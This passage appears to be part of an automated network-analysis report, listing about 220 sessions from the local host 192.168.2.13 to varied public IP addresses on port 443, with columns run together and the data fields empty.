                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18615192.168.2.1358638182.93.7.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18616192.168.2.1357376174.86.86.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18617192.168.2.1335664135.121.106.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18618192.168.2.1349858200.72.250.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18619192.168.2.1359770192.8.168.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18620192.168.2.1351256147.165.213.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18621192.168.2.1345144199.174.187.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18622192.168.2.135470671.98.154.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18623192.168.2.134924460.168.192.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18624192.168.2.134505475.0.25.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18625192.168.2.1338370150.89.160.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18626192.168.2.1346696154.91.223.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18627192.168.2.13384165.65.149.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18628192.168.2.1335094103.57.148.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18629192.168.2.134746625.115.19.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18630192.168.2.1346656182.229.27.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18631192.168.2.1356338115.133.32.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18632192.168.2.134426277.250.116.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18633192.168.2.1348442147.36.19.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18634192.168.2.1346138129.131.138.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18635192.168.2.1354164136.156.165.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18636192.168.2.1344556118.72.93.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18637192.168.2.1343496137.85.233.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18638192.168.2.134999219.94.226.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18639192.168.2.134253860.58.41.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18640192.168.2.133669490.163.159.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18641192.168.2.134543246.71.196.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18642192.168.2.1349782136.213.112.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18643192.168.2.1332912131.137.207.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18644192.168.2.1349242200.237.47.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18645192.168.2.134100068.56.32.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18646192.168.2.1340196132.138.236.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18647192.168.2.1346284198.226.211.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18648192.168.2.1344540170.184.68.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18649192.168.2.1333290194.129.46.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18650192.168.2.135307487.108.219.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18651192.168.2.1360768162.141.202.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18652192.168.2.134293236.21.91.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18653192.168.2.1342394147.176.221.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18654192.168.2.1339524192.183.27.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18655192.168.2.1338864156.251.61.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18656192.168.2.13402349.192.185.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18657192.168.2.1334702109.198.174.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18658192.168.2.1358160193.24.137.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18659192.168.2.134391242.253.143.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18660192.168.2.1357184108.230.55.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18661192.168.2.134805067.44.61.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18662192.168.2.136004037.38.42.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18663192.168.2.1337522156.97.95.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18664192.168.2.133686071.151.158.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18665192.168.2.135979644.135.158.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18666192.168.2.134357292.249.224.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18667192.168.2.135258484.243.119.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18668192.168.2.1341500149.34.78.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18669192.168.2.1344638206.76.176.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18670192.168.2.1333880194.64.76.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18671192.168.2.135786696.128.42.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18672192.168.2.1333922140.3.24.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18673192.168.2.1342450137.232.86.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18674192.168.2.1360924220.109.98.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18675192.168.2.1359182209.204.110.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18676192.168.2.135854690.144.175.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18677192.168.2.1353280219.234.16.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18678192.168.2.1344948218.48.12.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18679192.168.2.133966091.56.26.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18680192.168.2.135965667.4.115.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18681192.168.2.1338658150.156.229.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18682192.168.2.1360300142.48.235.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18683192.168.2.1351390172.215.236.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18684192.168.2.13421905.76.15.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18685192.168.2.1354370164.33.145.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18686192.168.2.135292420.246.241.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18687192.168.2.1348792182.88.1.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18688192.168.2.133521460.49.19.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18689192.168.2.1332798149.226.109.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18690192.168.2.1357816172.62.76.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18691192.168.2.1352864177.105.11.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18692192.168.2.134367027.183.180.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18693192.168.2.135705843.123.214.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18694192.168.2.135118484.93.99.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18695192.168.2.135423089.222.32.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18696192.168.2.1359754113.128.22.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18697192.168.2.1350522136.4.234.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18698192.168.2.1339128174.136.201.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18699192.168.2.1359016106.121.99.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18700192.168.2.1348052169.204.75.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18701192.168.2.134791437.6.247.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18702192.168.2.1360112204.226.241.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18703192.168.2.1343992161.234.132.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18704192.168.2.1359642192.83.18.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18705192.168.2.1336708142.94.148.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18706192.168.2.1352866150.238.237.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18707192.168.2.1333002136.160.46.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18708192.168.2.134470665.234.255.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18709192.168.2.1358778184.41.22.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18710192.168.2.135652639.231.160.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18711192.168.2.1354086200.72.179.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18712192.168.2.1349372146.59.70.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18713192.168.2.1354092203.250.237.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18714192.168.2.1348726189.139.126.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18715192.168.2.1348242102.66.36.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18716192.168.2.1340612126.168.168.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18717192.168.2.1351110169.133.123.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18718192.168.2.1354394143.43.7.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18719192.168.2.1348388189.162.63.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18720192.168.2.1343680185.21.244.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18721192.168.2.1351500152.169.160.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18722192.168.2.1338394123.76.6.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18723192.168.2.1353592154.232.28.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18724192.168.2.135206441.212.8.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18725192.168.2.135489092.36.250.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18726192.168.2.1353202168.93.7.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18727192.168.2.1337864118.57.83.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18728192.168.2.1341186221.184.177.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18729192.168.2.133684235.11.90.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18730192.168.2.134096017.13.11.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18731192.168.2.13608664.11.17.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18732192.168.2.13599562.84.245.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18733192.168.2.1336910197.118.249.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18734192.168.2.133393889.114.225.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18735192.168.2.135632486.69.86.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18736192.168.2.1337002208.197.108.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18737192.168.2.133739882.230.53.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18738192.168.2.1337156135.99.124.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18739192.168.2.134060414.44.18.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18740192.168.2.1336192141.36.146.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18741192.168.2.13501641.177.16.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18742192.168.2.1341166138.50.100.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18743192.168.2.134258861.64.58.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18744192.168.2.1343522148.185.155.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18745192.168.2.1358786130.76.104.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18746192.168.2.1352558223.33.135.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18747192.168.2.135592245.125.124.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18748192.168.2.1336440128.152.221.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18749192.168.2.1337712158.227.186.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18750192.168.2.133481477.198.75.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18751192.168.2.1341812180.184.95.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18752192.168.2.135702249.89.239.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18753192.168.2.1339248164.37.147.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18754192.168.2.1354826218.220.118.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18755192.168.2.1353410116.57.253.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18756192.168.2.13581662.93.23.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18757192.168.2.1354638210.50.55.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18758192.168.2.1360004123.135.77.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18759192.168.2.1353612192.210.100.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18760192.168.2.135738492.108.87.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18761192.168.2.1355462222.206.108.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18762192.168.2.1353750149.75.39.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18763192.168.2.1341838150.105.244.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18764192.168.2.134476898.71.33.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18765192.168.2.1355512132.110.110.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18766192.168.2.135427623.117.135.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18767192.168.2.134739289.236.142.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18768192.168.2.1350850105.8.93.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18769192.168.2.1337002198.2.96.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18770192.168.2.1350526136.182.97.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18771192.168.2.1355766209.250.2.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18772192.168.2.1360708105.0.241.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18773192.168.2.1342754149.110.144.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18774192.168.2.1333124153.127.97.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18775192.168.2.1333028173.195.40.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18776192.168.2.1356822147.102.142.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18777192.168.2.1344080180.32.34.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18778192.168.2.1336216183.63.49.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18779192.168.2.134794664.185.106.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18780192.168.2.1344776141.232.73.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18781192.168.2.1345710138.110.199.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18782192.168.2.134077661.232.101.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18783192.168.2.1347592144.131.96.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18784192.168.2.135209223.57.187.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18785192.168.2.135971479.105.217.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18786192.168.2.133446460.199.189.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18787192.168.2.1351926133.163.171.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18788192.168.2.1358104149.91.168.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18789192.168.2.1346310175.129.212.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18790192.168.2.1332960169.73.229.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18791192.168.2.1349434128.247.120.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18792192.168.2.1339494116.7.123.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18793192.168.2.1353308126.246.25.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18794192.168.2.1344198114.163.38.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18795192.168.2.1335440188.72.42.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18796192.168.2.1337808220.131.142.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18797192.168.2.1340434144.35.25.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18798192.168.2.135443260.231.122.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18799192.168.2.1333768170.112.236.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18800192.168.2.1343250121.18.175.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18801192.168.2.134713881.240.57.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18802192.168.2.1359884167.92.112.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18803192.168.2.1349356210.88.135.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18804192.168.2.1346722223.132.30.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18805192.168.2.1347234102.74.83.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18806192.168.2.1340680166.252.135.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18807192.168.2.1350842131.88.241.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18808192.168.2.1337896132.7.133.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18809192.168.2.1356054185.211.173.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18810192.168.2.133859850.219.9.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18811192.168.2.1351600211.82.61.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18812192.168.2.13589445.233.62.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18813192.168.2.1333768200.42.188.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18814192.168.2.135188284.36.1.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18815192.168.2.1358434194.251.205.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18816192.168.2.13561062.196.241.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18817192.168.2.133307873.174.26.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18818192.168.2.1333830115.177.235.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18819192.168.2.1339104188.84.33.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18820192.168.2.1348260177.223.160.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18821192.168.2.135917498.198.97.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18822192.168.2.134732850.54.204.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18823192.168.2.1351550133.110.132.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18824192.168.2.136096852.206.135.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18825192.168.2.1352166126.44.217.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18826192.168.2.1335656103.104.165.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18827192.168.2.1356354169.209.134.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18828192.168.2.1340492120.160.13.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18829192.168.2.1339230183.114.8.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18830192.168.2.1341442105.198.78.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18831192.168.2.1340358131.168.32.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18832192.168.2.1333176122.76.43.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18833192.168.2.133507048.49.49.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18834192.168.2.1344420148.127.187.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18835192.168.2.1360620179.23.153.211443
                                                TimestampBytes transferredDirectionData


